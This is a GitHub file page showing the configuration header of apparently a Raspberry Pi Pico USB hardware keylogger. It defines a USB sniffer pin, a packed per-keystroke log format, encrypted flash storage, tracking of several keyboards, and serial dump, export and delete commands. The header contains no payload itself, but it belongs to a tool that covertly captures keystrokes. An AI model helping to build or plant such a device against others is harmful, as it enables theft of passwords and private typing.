-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathKeylogConfig.h
More file actions
367 lines (297 loc) · 16.2 KB
/
KeylogConfig.h
File metadata and controls
367 lines (297 loc) · 16.2 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
/**
* @file KeylogConfig.h
* @brief Global configuration, data structures, and utility functions.
*
* Defines hardware pins, flash memory layout, packed event format,
* inter-core communication primitives, CRC lookup tables, and
* security utilities (secure_memzero, timing_safe_equal).
*/
#pragma once
#include <Arduino.h>
#include <hardware/sync.h>
// =============================================================================
// HARDWARE — Pin Assignments
// =============================================================================
#define PIN_SNIFFER_DP 16
#define PIN_NEOPIXEL 25
// =============================================================================
// FLASH MEMORY — Layout Overview
// =============================================================================
#define FLASH_LOG_SIZE (1024 * 1024)
#define FLASH_LOG_START (PICO_FLASH_SIZE_BYTES - FLASH_LOG_SIZE)
#ifndef FLASH_SECTOR_SIZE
#define FLASH_SECTOR_SIZE 4096
#endif
#ifndef FLASH_PAGE_SIZE
#define FLASH_PAGE_SIZE 256
#endif
// =============================================================================
// METADATA SECTOR — Crash-Safe State Journal
// =============================================================================
#define FLASH_META_START (FLASH_LOG_START - FLASH_SECTOR_SIZE)
#define META_MAGIC 0x4B4C4F47
#define META_ENTRIES_MAX (FLASH_SECTOR_SIZE / FLASH_PAGE_SIZE) // 16
/**
* @struct FlashMeta
* @brief Crash-safe state persisted periodically to flash.
*
* @details v2.3.1: nonce_floor moved here from CryptoHeader (E2/S4).
* This eliminates the erase+program of the crypto sector on
* every metadata persist, extending crypto sector life ~100×.
* CRC covers bytes [0..23].
*/
struct FlashMeta {
uint32_t magic; ///< Must be META_MAGIC for valid entry
uint32_t write_offset; ///< Current byte offset into the log region
uint32_t events_logged; ///< Events currently in the log (accurate after wrap)
uint32_t nonce_counter; ///< Monotonic CTR nonce (never wraps with same DEK)
uint32_t boot_uptime_ms; ///< millis() at time of persist (timeline anchor)
uint32_t nonce_floor; ///< Minimum accepted nonce on boot (replay protection)
uint16_t crc16; ///< CRC-16/CCITT of bytes [0..23]
uint16_t _reserved; ///< Padding to 28 bytes (set to 0)
};
/** @brief Number of bytes covered by the FlashMeta CRC (up to nonce_floor). */
#define META_CRC_SPAN 24
// =============================================================================
// CRYPTO SECTOR
// =============================================================================
#define FLASH_CRYPTO_START (FLASH_META_START - FLASH_SECTOR_SIZE)
// =============================================================================
// DATA PAGE LAYOUT — CRC-Protected Pages (256 bytes)
// =============================================================================
#define EVENTS_PER_PAGE 62
#define PAGE_COUNT_OFFSET (EVENTS_PER_PAGE * 4) // 248
#define PAGE_FLAGS_OFFSET (PAGE_COUNT_OFFSET + 1) // 249
#define PAGE_NONCE_OFFSET (PAGE_FLAGS_OFFSET + 1) // 250
#define PAGE_CRC_OFFSET (PAGE_NONCE_OFFSET + 4) // 254
// =============================================================================
// PACKED EVENT STRUCTURE — 4 Bytes per Keystroke
// =============================================================================
struct PackedEvent {
uint8_t scancode;
uint8_t meta;
uint16_t delta_ms;
};
// =============================================================================
// INTER-CORE RING BUFFER
// =============================================================================
#define RAM_BUFFER_SIZE 512
extern volatile PackedEvent ram_buffer[RAM_BUFFER_SIZE];
extern volatile uint16_t head_idx;
extern volatile uint16_t tail_idx;
// =============================================================================
// RING BUFFER OVERFLOW COUNTER
// =============================================================================
extern volatile uint32_t overflow_count;
// =============================================================================
// USB PACKET COUNTERS
// =============================================================================
extern volatile uint32_t usb_packets_total;
extern volatile uint32_t usb_packets_hid;
// =============================================================================
// INTER-CORE SYNCHRONIZATION FLAGS
// =============================================================================
extern volatile bool core0_request_pause;
extern volatile bool core1_ack_pause;
extern volatile bool core1_running;
// =============================================================================
// CORE 1 HEARTBEAT
// =============================================================================
extern volatile uint32_t core1_heartbeat_us;
#define CORE1_HEARTBEAT_TIMEOUT_US 2000000
// =============================================================================
// SERIAL COMMAND FLAGS
// =============================================================================
extern volatile bool dump_request;
extern volatile bool dump_hex_request;
extern volatile bool delete_request;
extern volatile bool cancel_request;
// =============================================================================
// INTER-CORE PAUSE HANDSHAKE TIMEOUT
// =============================================================================
#define PAUSE_HANDSHAKE_TIMEOUT_US 100000
// =============================================================================
// MULTI-KEYBOARD SUPPORT
// =============================================================================
#define MAX_TRACKED_KEYBOARDS 4
// =============================================================================
// SESSION MARKER
// =============================================================================
#define SCANCODE_SESSION_MARKER 0xFE
// =============================================================================
// PARTIAL PAGE FLUSH INTERVAL
// =============================================================================
#define FLUSH_INTERVAL_MS 60000
#define FLUSH_MIN_EVENTS 16
// =============================================================================
// METADATA PERSIST INTERVAL
// =============================================================================
#define META_PERSIST_INTERVAL 16
// =============================================================================
// PASSWORD LENGTH LIMIT
// =============================================================================
#define PASSWORD_MAX_LEN 64
// =============================================================================
// COMMAND BUFFER SIZE
// =============================================================================
#define CMD_BUFFER_SIZE 144
// =============================================================================
// READ PIN BRUTE-FORCE PROTECTION
// =============================================================================
#define RPIN_MAX_FAST_ATTEMPTS 3
#define RPIN_LOCKOUT_BASE_MS 1000
#define RPIN_LOCKOUT_MAX_MS 15000
// =============================================================================
// FIRMWARE INTEGRITY
// =============================================================================
#define FW_CRC_SIZE 16384
// =============================================================================
// LIVE MODE (U4 — clean mode suppresses modifier tags)
// =============================================================================
extern volatile bool live_mode_active;
/** @brief When true, LIVE suppresses [LSFT]/[/LSFT] style modifier tags. */
extern volatile bool live_clean_mode;
// =============================================================================
// USER EPOCH TIMESTAMP (U3 — absolute times in EXPORT)
// =============================================================================
/**
* @brief Unix epoch seconds set by the TIME command. 0 = unset.
* @details Current time = user_epoch_seconds + (millis() - epoch_set_millis) / 1000.
*/
extern uint32_t user_epoch_seconds;
/** @brief millis() at the moment TIME was issued. */
extern uint32_t epoch_set_millis;
// =============================================================================
// FLASH WEAR COUNTERS (E3 — displayed in STAT)
// =============================================================================
/** @brief Metadata sector erases since boot. */
extern uint32_t flash_wear_meta_erases;
/** @brief Log sector erases since boot. */
extern uint32_t flash_wear_log_erases;
// =============================================================================
// SERIAL FLOW CONTROL TIMEOUT (R2/R5)
// =============================================================================
/** @brief Maximum time serialFlowWait() will block before returning false. */
#define SERIAL_FLOW_TIMEOUT_MS 5000
// =============================================================================
// MEMORY BARRIER HELPER
// =============================================================================
static inline void memory_barrier() {
__dmb();
}
// =============================================================================
// CRC-16/CCITT — Lookup Table (~8× faster)
// =============================================================================
static const uint16_t __in_flash("crc16") crc16_table[256] = {
0x0000, 0x1021, 0x2042, 0x3063, 0x4084, 0x50A5, 0x60C6, 0x70E7,
0x8108, 0x9129, 0xA14A, 0xB16B, 0xC18C, 0xD1AD, 0xE1CE, 0xF1EF,
0x1231, 0x0210, 0x3273, 0x2252, 0x52B5, 0x4294, 0x72F7, 0x62D6,
0x9339, 0x8318, 0xB37B, 0xA35A, 0xD3BD, 0xC39C, 0xF3FF, 0xE3DE,
0x2462, 0x3443, 0x0420, 0x1401, 0x64E6, 0x74C7, 0x44A4, 0x5485,
0xA56A, 0xB54B, 0x8528, 0x9509, 0xE5EE, 0xF5CF, 0xC5AC, 0xD58D,
0x3653, 0x2672, 0x1611, 0x0630, 0x76D7, 0x66F6, 0x5695, 0x46B4,
0xB75B, 0xA77A, 0x9719, 0x8738, 0xF7DF, 0xE7FE, 0xD79D, 0xC7BC,
0x48C4, 0x58E5, 0x6886, 0x78A7, 0x0840, 0x1861, 0x2802, 0x3823,
0xC9CC, 0xD9ED, 0xE98E, 0xF9AF, 0x8948, 0x9969, 0xA90A, 0xB92B,
0x5AF5, 0x4AD4, 0x7AB7, 0x6A96, 0x1A71, 0x0A50, 0x3A33, 0x2A12,
0xDBFD, 0xCBDC, 0xFBBF, 0xEB9E, 0x9B79, 0x8B58, 0xBB3B, 0xAB1A,
0x6CA6, 0x7C87, 0x4CE4, 0x5CC5, 0x2C22, 0x3C03, 0x0C60, 0x1C41,
0xEDAE, 0xFD8F, 0xCDEC, 0xDDCD, 0xAD2A, 0xBD0B, 0x8D68, 0x9D49,
0x7E97, 0x6EB6, 0x5ED5, 0x4EF4, 0x3E13, 0x2E32, 0x1E51, 0x0E70,
0xFF9F, 0xEFBE, 0xDFDD, 0xCFFC, 0xBF1B, 0xAF3A, 0x9F59, 0x8F78,
0x9188, 0x81A9, 0xB1CA, 0xA1EB, 0xD10C, 0xC12D, 0xF14E, 0xE16F,
0x1080, 0x00A1, 0x30C2, 0x20E3, 0x5004, 0x4025, 0x7046, 0x6067,
0x83B9, 0x9398, 0xA3FB, 0xB3DA, 0xC33D, 0xD31C, 0xE37F, 0xF35E,
0x02B1, 0x1290, 0x22F3, 0x32D2, 0x4235, 0x5214, 0x6277, 0x7256,
0xB5EA, 0xA5CB, 0x95A8, 0x8589, 0xF56E, 0xE54F, 0xD52C, 0xC50D,
0x34E2, 0x24C3, 0x14A0, 0x0481, 0x7466, 0x6447, 0x5424, 0x4405,
0xA7DB, 0xB7FA, 0x8799, 0x97B8, 0xE75F, 0xF77E, 0xC71D, 0xD73C,
0x26D3, 0x36F2, 0x0691, 0x16B0, 0x6657, 0x7676, 0x4615, 0x5634,
0xD94C, 0xC96D, 0xF90E, 0xE92F, 0x99C8, 0x89E9, 0xB98A, 0xA9AB,
0x5844, 0x4865, 0x7806, 0x6827, 0x18C0, 0x08E1, 0x3882, 0x28A3,
0xCB7D, 0xDB5C, 0xEB3F, 0xFB1E, 0x8BF9, 0x9BD8, 0xABBB, 0xBB9A,
0x4A75, 0x5A54, 0x6A37, 0x7A16, 0x0AF1, 0x1AD0, 0x2AB3, 0x3A92,
0xFD2E, 0xED0F, 0xDD6C, 0xCD4D, 0xBDAA, 0xAD8B, 0x9DE8, 0x8DC9,
0x7C26, 0x6C07, 0x5C64, 0x4C45, 0x3CA2, 0x2C83, 0x1CE0, 0x0CC1,
0xEF1F, 0xFF3E, 0xCF5D, 0xDF7C, 0xAF9B, 0xBFBA, 0x8FD9, 0x9FF8,
0x6E17, 0x7E36, 0x4E55, 0x5E74, 0x2E93, 0x3EB2, 0x0ED1, 0x1EF0
};
static inline uint16_t calcCRC16(const uint8_t* data, uint16_t length) {
uint16_t crc = 0xFFFF;
for (uint16_t i = 0; i < length; i++) {
crc = (crc << 8) ^ crc16_table[((crc >> 8) ^ data[i]) & 0xFF];
}
return crc;
}
// =============================================================================
// CRC-32 — Lookup Table (~8× faster)
// =============================================================================
static const uint32_t __in_flash("crc32") crc32_table[256] = {
0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F,
0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988,
0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91, 0x1DB71064, 0x6AB020F2,
0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9,
0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172,
0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B, 0x35B5A8FA, 0x42B2986C,
0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423,
0xCFBA9599, 0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924,
0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190, 0x01DB7106,
0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D,
0x91646C97, 0xE6635C01, 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E,
0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950,
0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7,
0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0,
0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA,
0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F,
0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81,
0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A,
0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683, 0xE3630B12, 0x94643B84,
0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1,
0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB,
0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC,
0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5, 0xD6D6A3E8, 0xA1D1937E,
0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B,
0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55,
0x316E8EEF, 0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236,
0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE, 0xB2BD0B28,
0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D,
0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F,
0x72076785, 0x05005713, 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38,
0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242,
0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777,
0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69,
0x616BFFD3, 0x166CCF45, 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2,
0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC,
0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9,
0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693,
0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94,
0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D
};
static inline uint32_t calcCRC32(const uint8_t* data, uint32_t length) {
uint32_t crc = 0xFFFFFFFF;
for (uint32_t i = 0; i < length; i++) {
crc = (crc >> 8) ^ crc32_table[(crc ^ data[i]) & 0xFF];
}
return ~crc;
}
// =============================================================================
// SECURE MEMORY SCRUB
// =============================================================================
static inline void secure_memzero(void* ptr, size_t len) {
volatile uint8_t* vp = (volatile uint8_t*)ptr;
while (len--) { *vp++ = 0; }
}
// =============================================================================
// TIMING-SAFE COMPARISON
// =============================================================================
static inline bool timing_safe_equal(const void* a, const void* b, size_t len) {
const volatile uint8_t* va = (const volatile uint8_t*)a;
const volatile uint8_t* vb = (const volatile uint8_t*)b;
volatile uint8_t diff = 0;
for (size_t i = 0; i < len; i++) { diff |= va[i] ^ vb[i]; }
return diff == 0;
}